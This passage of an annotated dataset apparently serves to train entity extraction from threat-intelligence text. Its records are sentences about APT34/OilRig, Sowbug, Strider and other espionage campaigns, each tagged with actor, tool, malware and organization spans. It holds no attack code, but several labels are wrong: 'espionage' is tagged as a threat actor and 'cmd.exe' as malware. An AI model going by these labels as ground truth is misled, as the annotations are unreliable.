published a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware .", "spans": {"TOOL: POWBAT malware": [[162, 176]]}, "info": {"id": "dnrti_train_001142", "source": "dnrti_train"}} {"text": "In July 2017 , we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER , based on strings within the malware .", "spans": {"THREAT_ACTOR: APT34": [[27, 32]], "TOOL: PowerShell-based backdoor": [[78, 103]], "TOOL: POWRUNER": [[117, 125]], "TOOL: BONDUPDATER": [[203, 214]]}, "info": {"id": "dnrti_train_001143", "source": "dnrti_train"}} {"text": "APT34 loosely aligns with public reporting related to the group \" OilRig \" .", "spans": {"THREAT_ACTOR: APT34": [[0, 5]], "THREAT_ACTOR: group": [[58, 63]], "THREAT_ACTOR: OilRig": [[66, 72]]}, "info": {"id": "dnrti_train_001144", "source": "dnrti_train"}} {"text": "In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER .", "spans": {"THREAT_ACTOR: APT34": [[26, 31]], "VULNERABILITY: Microsoft Office vulnerability": [[53, 83]], "VULNERABILITY: CVE-2017-11882": [[84, 98]], "TOOL: POWRUNER": [[109, 117]], "TOOL: BONDUPDATER": [[122, 133]]}, "info": {"id": "dnrti_train_001146", "source": "dnrti_train"}} {"text": "The vulnerability was patched by Microsoft on Nov 14 , 2017 .", "spans": {"ORGANIZATION: Microsoft": [[33, 42]]}, "info": {"id": "dnrti_train_001147", "source": "dnrti_train"}} {"text": "The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas .", "spans": {"TOOL: Equation Editor": [[36, 51]], "MALWARE: EQNEDT32.EXE": [[54, 66]]}, "info": {"id": "dnrti_train_001148", "source": "dnrti_train"}} {"text": "During the 
past few months , APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities ( CVE-2017-0199 and CVE-2017-11882 ) to target organizations in the Middle East .", "spans": {"THREAT_ACTOR: APT34": [[29, 34]], "VULNERABILITY: CVE-2017-0199": [[125, 138]], "VULNERABILITY: CVE-2017-11882": [[143, 157]]}, "info": {"id": "dnrti_train_001149", "source": "dnrti_train"}} {"text": "The OilRig group ( AKA APT34 , Helix Kitten ) is an adversary motivated by espionage primarily operating in the Middle East region .", "spans": {"THREAT_ACTOR: OilRig group": [[4, 16]], "THREAT_ACTOR: APT34": [[23, 28]], "THREAT_ACTOR: Helix Kitten": [[31, 43]], "THREAT_ACTOR: espionage": [[75, 84]]}, "info": {"id": "dnrti_train_001150", "source": "dnrti_train"}} {"text": "We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region .", "spans": {"THREAT_ACTOR: APT34": [[10, 15]]}, "info": {"id": "dnrti_train_001151", "source": "dnrti_train"}} {"text": "We first discovered this group in mid-2016 , although it is possible their operations extends earlier than that time frame .", "spans": {"THREAT_ACTOR: group": [[25, 30]]}, "info": {"id": "dnrti_train_001153", "source": "dnrti_train"}} {"text": "Between May and June 2018 , Unit 42 observed multiple attacks by the OilRig group appearing to originate from a government agency in the Middle East .", "spans": {"ORGANIZATION: Unit 42": [[28, 35]], "THREAT_ACTOR: OilRig group": [[69, 81]], "ORGANIZATION: government agency": [[112, 129]]}, "info": {"id": "dnrti_train_001154", "source": "dnrti_train"}} {"text": "The use of script-based backdoors is a common technique used by the OilRig group as we have previously documented .", "spans": {"TOOL: script-based backdoors": [[11, 33]], "THREAT_ACTOR: OilRig group": [[68, 80]]}, "info": {"id": "dnrti_train_001155", "source": "dnrti_train"}} {"text": "The attacks delivered a PowerShell backdoor called 
QUADAGENT , a tool attributed to the OilRig group by both ClearSky Cyber Security and FireEye .", "spans": {"TOOL: PowerShell backdoor": [[24, 43]], "TOOL: QUADAGENT": [[51, 60]], "THREAT_ACTOR: OilRig group": [[88, 100]], "ORGANIZATION: ClearSky Cyber Security": [[109, 132]], "ORGANIZATION: FireEye": [[137, 144]]}, "info": {"id": "dnrti_train_001156", "source": "dnrti_train"}} {"text": "A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation .", "spans": {"THREAT_ACTOR: OilRig group": [[58, 70]], "TOOL: QUADAGENT samples": [[80, 97]], "TOOL: Invoke-Obfuscation": [[160, 178]]}, "info": {"id": "dnrti_train_001157", "source": "dnrti_train"}} {"text": "All three waves involved a single spear phishing email that appeared to originate from a government agency based in the Middle East .", "spans": {"ORGANIZATION: government agency": [[89, 106]]}, "info": {"id": "dnrti_train_001158", "source": "dnrti_train"}} {"text": "This latest attack consisted of three waves between May and June 2018 .", "spans": {}, "info": {"id": "dnrti_train_001159", "source": "dnrti_train"}} {"text": "The OilRig group continues to be a persistent adversary group in the Middle East region .", "spans": {"THREAT_ACTOR: OilRig group": [[4, 16]], "THREAT_ACTOR: group": [[56, 61]]}, "info": {"id": "dnrti_train_001160", "source": "dnrti_train"}} {"text": "APT34 are involved in long-term cyber espionage operations largely focused on the Middle East .", "spans": {"THREAT_ACTOR: APT34": [[0, 5]]}, "info": {"id": "dnrti_train_001161", "source": "dnrti_train"}} {"text": "Recent investigations by FireEye 's Mandiant incident response consultants combined with FireEye iSIGHT Threat Intelligence analysis have given us a more complete picture of a suspected Iranian threat group , that we believe has been operating since at least 2014 .", "spans": {"ORGANIZATION: FireEye 's Mandiant": [[25, 
44]], "ORGANIZATION: FireEye iSIGHT Threat Intelligence": [[89, 123]], "THREAT_ACTOR: threat group": [[194, 206]]}, "info": {"id": "dnrti_train_001163", "source": "dnrti_train"}} {"text": "On January 8 , 2018 , Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East .", "spans": {"ORGANIZATION: Unit 42": [[22, 29]], "THREAT_ACTOR: OilRig": [[43, 49]], "THREAT_ACTOR: threat group": [[50, 62]], "ORGANIZATION: insurance agency": [[89, 105]]}, "info": {"id": "dnrti_train_001165", "source": "dnrti_train"}} {"text": "APT34 uses a mix of public and non-public tools , often conducting spear phishing operations using compromised accounts from trusted third parties , sometimes coupled with social engineering tactics .", "spans": {"THREAT_ACTOR: APT34": [[0, 5]], "TOOL: public and non-public tools": [[20, 47]], "TOOL: compromised accounts": [[99, 119]]}, "info": {"id": "dnrti_train_001166", "source": "dnrti_train"}} {"text": "Just over a week later , on January 16 , 2018 , we observed an attack on a Middle Eastern financial institution .", "spans": {"ORGANIZATION: financial institution": [[90, 111]]}, "info": {"id": "dnrti_train_001167", "source": "dnrti_train"}} {"text": "The January 8 attack used a variant of the ThreeDollars delivery document , which we identified as part of the OilRig toolset based on attacks that occurred in August 2017 .", "spans": {"MALWARE: ThreeDollars delivery document": [[43, 73]], "THREAT_ACTOR: OilRig": [[111, 117]]}, "info": {"id": "dnrti_train_001168", "source": "dnrti_train"}} {"text": "However , the attack on January 16 did not involve ThreeDollars at all .", "spans": {"TOOL: ThreeDollars": [[51, 63]]}, "info": {"id": "dnrti_train_001169", "source": "dnrti_train"}} {"text": "Interestingly , the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017 .", "spans": {"THREAT_ACTOR: OilRig group": [[100, 112]]}, "info": {"id": 
"dnrti_train_001170", "source": "dnrti_train"}} {"text": "Instead , OilRig 's attack involved delivering the OopsIE Trojan directly to the victim , most likely using a link in a spear phishing email .", "spans": {"THREAT_ACTOR: OilRig": [[10, 16]], "TOOL: OopsIE Trojan": [[51, 64]]}, "info": {"id": "dnrti_train_001171", "source": "dnrti_train"}} {"text": "In the January 16 , 2018 attack , we observed OilRig attacking an organization it previously targeted in January 2017 .", "spans": {}, "info": {"id": "dnrti_train_001172", "source": "dnrti_train"}} {"text": "On January 8 , 2018 , the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East .", "spans": {"THREAT_ACTOR: OilRig": [[26, 32]], "THREAT_ACTOR: threat group": [[33, 45]], "ORGANIZATION: insurance agency": [[119, 135]]}, "info": {"id": "dnrti_train_001173", "source": "dnrti_train"}} {"text": "The email contained an attachment named Seminar-Invitation.doc , which is a malicious Microsoft Word document we track as ThreeDollars .", "spans": {"MALWARE: Seminar-Invitation.doc": [[40, 62]], "TOOL: Microsoft Word": [[86, 100]], "TOOL: ThreeDollars": [[122, 134]]}, "info": {"id": "dnrti_train_001174", "source": "dnrti_train"}} {"text": "This suggests that due to the January 2017 attack , the targeted organization may have taken actions to counter known OilRig TTPs , in this case delivering malicious macro documents , causing the OilRig operators to adopt a different delivery tactic .", "spans": {"THREAT_ACTOR: OilRig": [[118, 124], [196, 202]], "THREAT_ACTOR: operators": [[203, 212]]}, "info": {"id": "dnrti_train_001175", "source": "dnrti_train"}} {"text": "We also identified another sample of ThreeDollars , created on January 15 , 2017 with the file name strategy preparation.dot .", "spans": {"TOOL: ThreeDollars": [[37, 49]], "MALWARE: preparation.dot": [[109, 124]]}, "info": {"id": "dnrti_train_001176", "source": "dnrti_train"}} {"text": "The 
samples of ThreeDollars we collected in these attacks are structurally very similar to the first sample we analyzed in October 2017 , down to the lure image used to trick the recipient into clicking the \" Enable Content \" button to execute the malicious macro .", "spans": {"TOOL: ThreeDollars": [[15, 27]]}, "info": {"id": "dnrti_train_001177", "source": "dnrti_train"}} {"text": "Since May 2016 , we have continued to monitor and uncover various attacks and tools associated with the OilRig group .", "spans": {"THREAT_ACTOR: OilRig group": [[104, 116]]}, "info": {"id": "dnrti_train_001178", "source": "dnrti_train"}} {"text": "] com , which we previously identified in October 2017 to be an OilRig C2 .", "spans": {"THREAT_ACTOR: OilRig": [[64, 70]]}, "info": {"id": "dnrti_train_001179", "source": "dnrti_train"}} {"text": "Based on previously observed tactics , it is highly likely the OilRig group leveraged credential harvesting and compromised accounts to use the government agency as a launching platform for their true attacks .", "spans": {"THREAT_ACTOR: OilRig group": [[63, 75]], "TOOL: credential harvesting": [[86, 107]], "TOOL: compromised accounts": [[112, 132]], "ORGANIZATION: government agency": [[144, 161]]}, "info": {"id": "dnrti_train_001180", "source": "dnrti_train"}} {"text": "Inspecting the class C network for 185.162.235.0/24 shows us that another IP on the same network resolves to an OilRig domain , msoffice-cdn.com which we identified in August 2017 .", "spans": {"THREAT_ACTOR: OilRig": [[112, 118]]}, "info": {"id": "dnrti_train_001181", "source": "dnrti_train"}} {"text": "We had previously observed this author name in use once before , in the very first ThreeDollars document we collected that we had reported on in August 2017 .", "spans": {"MALWARE: ThreeDollars document": [[83, 104]]}, "info": {"id": "dnrti_train_001182", "source": "dnrti_train"}} {"text": "The OilRig group continues to remain a highly active adversary in the Middle East region .", 
"spans": {"THREAT_ACTOR: OilRig group": [[4, 16]]}, "info": {"id": "dnrti_train_001183", "source": "dnrti_train"}} {"text": "Organizations detected a compromise themselves in 62% of the cases that Mandiant worked in 2017 .", "spans": {"ORGANIZATION: Mandiant": [[72, 80]]}, "info": {"id": "dnrti_train_001184", "source": "dnrti_train"}} {"text": "Repeated targeting of Middle Eastern financial , energy and government organizations leads FireEye to assess that those sectors are a primary concern of APT34 .", "spans": {"ORGANIZATION: financial": [[37, 46]], "ORGANIZATION: energy": [[49, 55]], "ORGANIZATION: government organizations": [[60, 84]], "ORGANIZATION: FireEye": [[91, 98]], "THREAT_ACTOR: APT34": [[153, 158]]}, "info": {"id": "dnrti_train_001186", "source": "dnrti_train"}} {"text": "The use of infrastructure tied to Iranian operations , timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government .", "spans": {"ORGANIZATION: FireEye": [[122, 129]], "THREAT_ACTOR: APT34": [[145, 150]]}, "info": {"id": "dnrti_train_001187", "source": "dnrti_train"}} {"text": "APT34 uses a mix of public and non-public tools ( Fig.2 ) and often uses compromised accounts to conduct spear-phishing operations .", "spans": {"THREAT_ACTOR: APT34": [[0, 5]], "TOOL: public and non-public tools": [[20, 47]], "TOOL: compromised accounts": [[73, 93]]}, "info": {"id": "dnrti_train_001188", "source": "dnrti_train"}} {"text": "Unit 42 's ongoing research into the OilRig campaign shows that the threat actors involved in the original attack campaign continue to add new Trojans to their toolset and continue their persistent attacks in the Middle East .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "THREAT_ACTOR: threat actors": [[68, 81]]}, "info": {"id": "dnrti_train_001190", "source": "dnrti_train"}} {"text": "When we first discovered the OilRig attack campaign in May 2016 , we believed at the time it was a unique attack 
campaign likely operated by a known , existing threat group .", "spans": {"THREAT_ACTOR: threat group": [[160, 172]]}, "info": {"id": "dnrti_train_001191", "source": "dnrti_train"}} {"text": "The email address is associated with the Lebanese domain of a major global financial institution .", "spans": {"ORGANIZATION: financial institution": [[75, 96]]}, "info": {"id": "dnrti_train_001192", "source": "dnrti_train"}} {"text": "In July 2017 , we observed the OilRig group using a tool they developed called ISMAgent in a new set of targeted attacks .", "spans": {"THREAT_ACTOR: OilRig group": [[31, 43]], "TOOL: ISMAgent": [[79, 87]]}, "info": {"id": "dnrti_train_001194", "source": "dnrti_train"}} {"text": "In August 2017 , we found this threat group has developed yet another Trojan that they call ' Agent Injector ' with the specific purpose of installing the ISMAgent backdoor .", "spans": {"THREAT_ACTOR: threat group": [[31, 43]], "TOOL: ISMAgent backdoor": [[155, 172]]}, "info": {"id": "dnrti_train_001195", "source": "dnrti_train"}} {"text": "On August 23 , 2017 , we observed OilRig targeting an organization within the United Arab Emirates government .", "spans": {"THREAT_ACTOR: OilRig": [[34, 40]]}, "info": {"id": "dnrti_train_001196", "source": "dnrti_train"}} {"text": "Based on that research and this observation , we postulate that the OilRig group gathered credentials to a legitimate user 's OWA account and logged into the user 's account to send phishing attacks to other individuals within the same , targeted organization .", "spans": {"THREAT_ACTOR: OilRig group": [[68, 80]]}, "info": {"id": "dnrti_train_001197", "source": "dnrti_train"}} {"text": "The OilRig group continues to target organizations in the Middle East , in this instance targeting the government of the United Arab Emirates .", "spans": {"THREAT_ACTOR: OilRig group": [[4, 16]]}, "info": {"id": "dnrti_train_001198", "source": "dnrti_train"}} {"text": "The payload embedded within the ISMInjector sample 
delivered in this attack is a variant of the ISMAgent backdoor that we had discussed in detail in our blog discussing a targeted attack on a Saudi Arabian technology company .", "spans": {"TOOL: ISMInjector sample": [[32, 50]], "TOOL: ISMAgent backdoor": [[96, 113]], "ORGANIZATION: technology company": [[206, 224]]}, "info": {"id": "dnrti_train_001199", "source": "dnrti_train"}} {"text": "Initial inspection of this attack suggested this was again the OilRig campaign using their existing toolset , but further examination revealed not only new variants of the delivery document we named Clayslide , but also a different payload embedded inside it .", "spans": {"TOOL: Clayslide": [[199, 208]]}, "info": {"id": "dnrti_train_001200", "source": "dnrti_train"}} {"text": "In July 2017 , we observed an attack on a Middle Eastern technology organization that was also targeted by the OilRig campaign in August 2016 .", "spans": {"ORGANIZATION: technology organization": [[57, 80]]}, "info": {"id": "dnrti_train_001201", "source": "dnrti_train"}} {"text": "This technique was observed in previous Clayslide documents to access the script variant of the Helminth Trojan in earlier OilRig attacks .", "spans": {"TOOL: Clayslide documents": [[40, 59]]}, "info": {"id": "dnrti_train_001202", "source": "dnrti_train"}} {"text": "In the past , we had primarily associated the OilRig campaign with using the Clayslide documents to deliver as a payload a Trojan we named Helminth ; in this instance , the payload was instead a variant of the ISMDoor Trojan with significant modifications which we are now tracking as ISMAgent .", "spans": {"TOOL: Clayslide documents": [[77, 96]], "TOOL: Helminth": [[139, 147]], "TOOL: ISMDoor Trojan": [[210, 224]], "TOOL: ISMAgent": [[285, 293]]}, "info": {"id": "dnrti_train_001203", "source": "dnrti_train"}} {"text": "The June 2017 sample of Clayslide contained the same OfficeServicesStatus.vbs file found in the ISMAgent Clayslide document , but instead of having the 
payload embedded in the macro as segregated base64 strings that would be concatenated , this variant obtained its payload from multiple cells within the \" Incompatible \" worksheet .", "spans": {"TOOL: Clayslide": [[24, 33]], "MALWARE: OfficeServicesStatus.vbs file": [[53, 82]], "TOOL: ISMAgent Clayslide document": [[96, 123]]}, "info": {"id": "dnrti_train_001204", "source": "dnrti_train"}} {"text": "Clearly , OilRig incorporates a testing component within their development process , as we have previously observed OilRig performing testing activities on their delivery documents and their TwoFace webshells .", "spans": {"THREAT_ACTOR: OilRig": [[10, 16], [116, 122]], "TOOL: delivery documents": [[162, 180]], "TOOL: TwoFace webshells": [[191, 208]]}, "info": {"id": "dnrti_train_001205", "source": "dnrti_train"}} {"text": "While continuing research on the August 2018 attacks on a Middle eastern government that delivered BONDUPDATER , Unit 42 researchers observed OilRig 's testing activities and with high confidence links this testing to the creation of the weaponized delivery document used in this attack .", "spans": {"TOOL: BONDUPDATER": [[99, 110]], "ORGANIZATION: Unit 42": [[113, 120]], "THREAT_ACTOR: OilRig": [[142, 148]]}, "info": {"id": "dnrti_train_001206", "source": "dnrti_train"}} {"text": "While investigating recent attacks performed by the threat actor group OilRig using their new Bondupdater version , Unit 42 researchers searched for additional Microsoft Office documents used by OilRig hoping to locate additional malware being used in other attacks during the same time period .", "spans": {"THREAT_ACTOR: threat actor group OilRig": [[52, 77]], "TOOL: Bondupdater": [[94, 105]], "ORGANIZATION: Unit 42": [[116, 123]], "THREAT_ACTOR: OilRig": [[195, 201]]}, "info": {"id": "dnrti_train_001207", "source": "dnrti_train"}} {"text": "The tester created the final test file less than 8 hours before the creation time of a delivery document , which was then delivered 
via a spear-phishing email 20 minutes later .", "spans": {}, "info": {"id": "dnrti_train_001208", "source": "dnrti_train"}} {"text": "During this testing , we saw document filenames that contain the C2 we witnessed in the targeted attack above , specifically the filenames XLS-withyourface.xls and XLS-withyourface – test.xls .", "spans": {"MALWARE: XLS-withyourface.xls": [[139, 159]], "MALWARE: XLS-withyourface – test.xls": [[164, 191]]}, "info": {"id": "dnrti_train_001209", "source": "dnrti_train"}} {"text": "These samples appeared to have been created by OilRig during their development and testing activities , all of which share many similarities with the delivery document used in the recent OilRig attack against a Middle Eastern government , N56.15.doc ( 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 ) that we have also included in Table 1 .", "spans": {"THREAT_ACTOR: OilRig": [[47, 53]], "MALWARE: N56.15.doc": [[239, 249]]}, "info": {"id": "dnrti_train_001210", "source": "dnrti_train"}} {"text": "However , they later continued by making modifications to the Excel document just prior to the attack on August 26th .", "spans": {}, "info": {"id": "dnrti_train_001211", "source": "dnrti_train"}} {"text": "Additionally , HELIX KITTEN actors have shown an affinity for creating thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel .", "spans": {"THREAT_ACTOR: HELIX KITTEN actors": [[15, 34]], "ORGANIZATION: personnel": [[170, 179]]}, "info": {"id": "dnrti_train_001213", "source": "dnrti_train"}} {"text": "In addition to Helminth , the ISMDoor implant is likely used by the Iran-based adversary to attack targets particularly those in the Middle East region .", "spans": {"TOOL: Helminth": [[15, 23]], "TOOL: ISMDoor": [[30, 37]]}, "info": {"id": "dnrti_train_001214", "source": "dnrti_train"}} {"text": "These incidents involved spear-phishing attacks , which characteristic of HELIX KITTEN , included 
emails containing malicious PowerShell in their macros that connects to known C2 infrastructure .", "spans": {"THREAT_ACTOR: HELIX KITTEN": [[74, 86]], "TOOL: PowerShell": [[126, 136]]}, "info": {"id": "dnrti_train_001215", "source": "dnrti_train"}} {"text": "During the summer of 2018 , HELIX KITTEN actors were observed targeting entities in the Middle East — of note , targets appeared to be located in Bahrain and Kuwait .", "spans": {"THREAT_ACTOR: HELIX KITTEN actors": [[28, 47]]}, "info": {"id": "dnrti_train_001216", "source": "dnrti_train"}} {"text": "ISMDoor is able to exfiltrate data , take screenshots , and execute arbitrary commands on the victim 's machine .", "spans": {"TOOL: ISMDoor": [[0, 7]]}, "info": {"id": "dnrti_train_001217", "source": "dnrti_train"}} {"text": "In early November 2018 , CrowdStrike observed activity from the HELIX KITTEN adversary at a customer in the telecommunications vertical .", "spans": {"ORGANIZATION: CrowdStrike": [[25, 36]], "THREAT_ACTOR: HELIX KITTEN": [[64, 76]]}, "info": {"id": "dnrti_train_001218", "source": "dnrti_train"}} {"text": "The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "MALWARE: XLS files": [[60, 69]], "ORGANIZATION: employees working in the banking sector": [[73, 112]]}, "info": {"id": "dnrti_train_001219", "source": "dnrti_train"}} {"text": "In the first week of May 2016 , FireEye 's DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region .", "spans": {"ORGANIZATION: FireEye 's DTI": [[32, 46]], "MALWARE: malicious attachments": [[86, 107]]}, "info": {"id": "dnrti_train_001220", "source": "dnrti_train"}} {"text": "Our data suggests that actors have deployed the RGDoor backdoor on webservers belonging to eight Middle Eastern government organizations , as well as one financial and one educational institution .", 
"spans": {"THREAT_ACTOR: actors": [[23, 29]], "TOOL: RGDoor backdoor": [[48, 63]], "ORGANIZATION: government organizations": [[112, 136]], "ORGANIZATION: financial": [[154, 163]], "ORGANIZATION: educational institution": [[172, 195]]}, "info": {"id": "dnrti_train_001221", "source": "dnrti_train"}} {"text": "In August 2018 , Unit 42 observed OilRig targeting a government organization using spear-phishing emails to deliver an updated version of a Trojan known as BONDUPDATER .", "spans": {"ORGANIZATION: Unit 42": [[17, 24]], "THREAT_ACTOR: OilRig": [[34, 40]], "ORGANIZATION: government organization": [[53, 76]], "TOOL: BONDUPDATER": [[156, 167]]}, "info": {"id": "dnrti_train_001222", "source": "dnrti_train"}} {"text": "The OilRig group has been active since at least mid-2016 , and continues their attack campaigns throughout the Middle East , targeting both governmental agencies and businesses on an almost routine basis .", "spans": {"THREAT_ACTOR: OilRig group": [[4, 16]], "ORGANIZATION: governmental agencies": [[140, 161]]}, "info": {"id": "dnrti_train_001223", "source": "dnrti_train"}} {"text": "BONDUPDATER is a PowerShell-based Trojan first discovered by FireEye in mid-November 2017 , when OilRig targeted a different Middle Eastern governmental organization .", "spans": {"TOOL: BONDUPDATER": [[0, 11]], "TOOL: PowerShell-based Trojan": [[17, 40]], "ORGANIZATION: FireEye": [[61, 68]], "THREAT_ACTOR: OilRig": [[97, 103]], "ORGANIZATION: governmental organization": [[140, 165]]}, "info": {"id": "dnrti_train_001224", "source": "dnrti_train"}} {"text": "During the past month , Unit 42 observed several attacks against a Middle Eastern government leveraging an updated version of the BONDUPDATER malware , which now includes the ability to use TXT records within its DNS tunneling protocol for its C2 communications .", "spans": {"ORGANIZATION: Unit 42": [[24, 31]], "TOOL: BONDUPDATER malware": [[130, 149]], "TOOL: DNS tunneling": [[213, 226]]}, "info": {"id": 
"dnrti_train_001225", "source": "dnrti_train"}} {"text": "The email had no subject and what initially drew our attention to OilRig 's attack was the content of the spear phishing email .", "spans": {"THREAT_ACTOR: OilRig": [[66, 72]]}, "info": {"id": "dnrti_train_001226", "source": "dnrti_train"}} {"text": "As expected , OilRig is continuing their onslaught of attacks well into 2018 with continued targeting in the Middle East .", "spans": {"THREAT_ACTOR: OilRig": [[14, 20]]}, "info": {"id": "dnrti_train_001227", "source": "dnrti_train"}} {"text": "First identified in January 2015 , Orangeworm has also conducted targeted attacks against organizations in related industries as part of a larger supply-chain attack in order to reach their intended victims .", "spans": {}, "info": {"id": "dnrti_train_001228", "source": "dnrti_train"}} {"text": "According to Symantec telemetry , almost 40 percent of Orangeworm 's confirmed victim organizations operate within the healthcare industry .", "spans": {"ORGANIZATION: Symantec": [[13, 21]]}, "info": {"id": "dnrti_train_001229", "source": "dnrti_train"}} {"text": "Their next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents .", "spans": {"ORGANIZATION: government office": [[116, 133]], "MALWARE: Word documents": [[188, 202]]}, "info": {"id": "dnrti_train_001230", "source": "dnrti_train"}} {"text": "Sowbug 's next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents .", "spans": {"THREAT_ACTOR: Sowbug": [[0, 6]], "ORGANIZATION: government office": [[120, 137]], "MALWARE: Word documents": [[192, 206]]}, "info": {"id": "dnrti_train_001231", "source": "dnrti_train"}} {"text": "For example , in September 2016 , Sowbug infiltrated an organization in Asia , 
deploying the Felismus backdoor on one of its computers , Computer A , using the file name adobecms.exe in CSIDL_WINDOWS\\debug .", "spans": {"THREAT_ACTOR: Sowbug": [[34, 40]], "TOOL: Felismus backdoor": [[93, 110]], "MALWARE: adobecms.exe": [[170, 182]], "MALWARE: CSIDL_WINDOWS\\debug": [[186, 205]]}, "info": {"id": "dnrti_train_001232", "source": "dnrti_train"}} {"text": "In this case , the attackers maintained a presence on the target 's network for nearly six months between September 2016 and March 2017 .", "spans": {}, "info": {"id": "dnrti_train_001233", "source": "dnrti_train"}} {"text": "In other attacks , there was evidence that Felismus was installed using a tool known as Starloader ( detected by Symantec as Trojan.Starloader ) .", "spans": {"TOOL: Felismus": [[43, 51]], "TOOL: Starloader": [[88, 98]], "ORGANIZATION: Symantec": [[113, 121]], "TOOL: Trojan.Starloader": [[125, 142]]}, "info": {"id": "dnrti_train_001234", "source": "dnrti_train"}} {"text": "Symantec has found evidence of Starloader files being named AdobeUpdate.exe , AcrobatUpdate.exe , and INTELUPDATE.EXE among others .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "MALWARE: Starloader files": [[31, 47]], "MALWARE: AdobeUpdate.exe": [[60, 75]], "MALWARE: AcrobatUpdate.exe": [[78, 95]], "MALWARE: INTELUPDATE.EXE": [[102, 117]]}, "info": {"id": "dnrti_train_001235", "source": "dnrti_train"}} {"text": "Additionally , Starloader was also observed deploying additional tools used by the attackers , such as credential dumpers and keyloggers .", "spans": {"TOOL: Starloader": [[15, 25]], "TOOL: credential dumpers": [[103, 121]], "TOOL: keyloggers": [[126, 136]]}, "info": {"id": "dnrti_train_001236", "source": "dnrti_train"}} {"text": "ASERT has learned of an APT campaign , possibly originating from DPRK , we are calling STOLEN PENCIL that is targeting academic institutions since at least May 2018 .", "spans": {"ORGANIZATION: ASERT": [[0, 5]], "ORGANIZATION: academic institutions": [[119, 140]]}, 
"info": {"id": "dnrti_train_001237", "source": "dnrti_train"}} {"text": "Once gaining a foothold on a user 's system , the threat actors behind STOLEN PENCIL use Microsoft 's Remote Desktop Protocol ( RDP ) for remote point-and-click access .", "spans": {"ORGANIZATION: Microsoft": [[89, 98]], "TOOL: Remote Desktop Protocol": [[102, 125]], "TOOL: RDP": [[128, 131]]}, "info": {"id": "dnrti_train_001238", "source": "dnrti_train"}} {"text": "The group uses an advanced piece of malware known as Remsec ( Backdoor.Remsec ) to conduct its attacks .", "spans": {"TOOL: Remsec": [[53, 59]], "TOOL: Backdoor.Remsec": [[62, 77]]}, "info": {"id": "dnrti_train_001239", "source": "dnrti_train"}} {"text": "Strider has been active since at least October 2011 .", "spans": {"THREAT_ACTOR: Strider": [[0, 7]]}, "info": {"id": "dnrti_train_001240", "source": "dnrti_train"}} {"text": "Lua modules is a technique that has previously been used by Flamer .", "spans": {"TOOL: Lua modules": [[0, 11]]}, "info": {"id": "dnrti_train_001241", "source": "dnrti_train"}} {"text": "The Remsec malware used by Strider has a modular design .", "spans": {"TOOL: Remsec malware": [[4, 18]], "THREAT_ACTOR: Strider": [[27, 34]]}, "info": {"id": "dnrti_train_001242", "source": "dnrti_train"}} {"text": "The group has maintained a low profile until now and its targets have been mainly organizations and individuals that would be of interest to a nation state 's intelligence services .", "spans": {}, "info": {"id": "dnrti_train_001243", "source": "dnrti_train"}} {"text": "The group 's targets include a number of organizations and individuals located in Russia .", "spans": {}, "info": {"id": "dnrti_train_001244", "source": "dnrti_train"}} {"text": "Remsec uses a Lua interpreter to run Lua modules which perform various functions .", "spans": {"TOOL: Remsec": [[0, 6]], "TOOL: Lua interpreter": [[14, 29]], "TOOL: Lua modules": [[37, 48]]}, "info": {"id": "dnrti_train_001245", "source": "dnrti_train"}} {"text": "The 
attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information .", "spans": {"MALWARE: cmd.exe": [[80, 87]]}, "info": {"id": "dnrti_train_001247", "source": "dnrti_train"}} {"text": "the group 's targets include an organization in Sweden .", "spans": {}, "info": {"id": "dnrti_train_001248", "source": "dnrti_train"}} {"text": "the group 's targets include an embassy in Belgium .", "spans": {"ORGANIZATION: embassy": [[32, 39]]}, "info": {"id": "dnrti_train_001249", "source": "dnrti_train"}} {"text": "Symantec will continue to search for more Remsec modules and targets in order to build upon our understanding of Strider and better protect our customers .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "TOOL: Remsec modules": [[42, 56]], "THREAT_ACTOR: Strider": [[113, 120]]}, "info": {"id": "dnrti_train_001250", "source": "dnrti_train"}} {"text": "Another such an exceptional espionage platform is \" ProjectSauron , also known as \" Strider \" .", "spans": {"TOOL: ProjectSauron": [[52, 65]], "THREAT_ACTOR: Strider": [[84, 91]]}, "info": {"id": "dnrti_train_001251", "source": "dnrti_train"}} {"text": "In September 2015 , our anti-targeted attack technologies caught a previously unknown attack .", "spans": {}, "info": {"id": "dnrti_train_001252", "source": "dnrti_train"}} {"text": "Forensic analysis indicates that the APT has been operational since at least June 2011 and was still active in 2016 .", "spans": {}, "info": {"id": "dnrti_train_001253", "source": "dnrti_train"}} {"text": "After getting the IP , the ProjectSauron component tries to communicate with the remote server using its own ( ProjectSauron ) protocol as if it was yet another C&C server .", "spans": {"TOOL: ProjectSauron": [[27, 40], [111, 124]]}, "info": {"id": "dnrti_train_001254", "source": "dnrti_train"}} {"text": "In a number of the cases we analyzed , ProjectSauron 
